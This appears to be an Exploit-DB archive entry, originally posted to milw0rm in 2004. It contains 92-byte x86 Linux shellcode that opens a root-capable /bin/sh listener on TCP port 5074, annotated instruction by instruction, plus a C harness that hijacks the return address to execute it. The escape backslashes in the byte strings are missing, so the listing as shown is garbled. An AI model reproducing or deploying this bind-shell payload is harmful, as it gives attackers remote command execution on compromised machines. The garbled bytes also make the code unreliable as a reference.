https://www.exploit-db.com/exploits/13448

漏洞细节尚未披露

/* 
 * [email protected]
 * x86 portbind a shell in port 5074
 * 92 bytes.
 *
 */

char shellcode[] =
"x31xc0"			// xorl		%eax,%eax
"x50"				// pushl	%eax
"x40"				// incl		%eax
"x89xc3"			// movl		%eax,%ebx
"x50"				// pushl	%eax
"x40"				// incl		%eax
"x50"				// pushl	%eax
"x89xe1"			// movl		%esp,%ecx
"xb0x66"			// movb		$0x66,%al
"xcdx80"			// int		$0x80
"x31xd2"			// xorl		%edx,%edx
"x52"				// pushl	%edx
"x66x68x13xd2"		// pushw	$0xd213
"x43"				// incl		%ebx
"x66x53"			// pushw	%bx
"x89xe1"			// movl		%esp,%ecx
"x6ax10"			// pushl	$0x10
"x51"				// pushl	%ecx
"x50"				// pushl	%eax
"x89xe1"			// movl		%esp,%ecx
"xb0x66"			// movb		$0x66,%al
"xcdx80"			// int		$0x80
"x40"				// incl		%eax
"x89x44x24x04"		// movl		%eax,0x4(%esp,1)
"x43"				// incl		%ebx
"x43"				// incl		%ebx
"xb0x66"			// movb		$0x66,%al
"xcdx80"			// int		$0x80
"x83xc4x0c"			// addl		$0xc,%esp
"x52"				// pushl	%edx
"x52"				// pushl	%edx
"x43"				// incl		%ebx
"xb0x66"			// movb		$0x66,%al
"xcdx80"			// int		$0x80
"x93"				// xchgl	%eax,%ebx
"x89xd1"			// movl		%edx,%ecx
"xb0x3f"			// movb		$0x3f,%al
"xcdx80"			// int		$0x80
"x41"				// incl		%ecx
"x80xf9x03"			// cmpb		$0x3,%cl
"x75xf6"			// jnz		<shellcode+0x40>
"x52"				// pushl	%edx
"x68x6ex2fx73x68"		// pushl	$0x68732f6e
"x68x2fx2fx62x69"		// pushl	$0x69622f2f
"x89xe3"			// movl		%esp,%ebx
"x52"				// pushl	%edx
"x53"				// pushl	%ebx
"x89xe1"			// movl		%esp,%ecx
"xb0x0b"			// movb		$0xb,%al
"xcdx80"			// int		$0x80
;

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]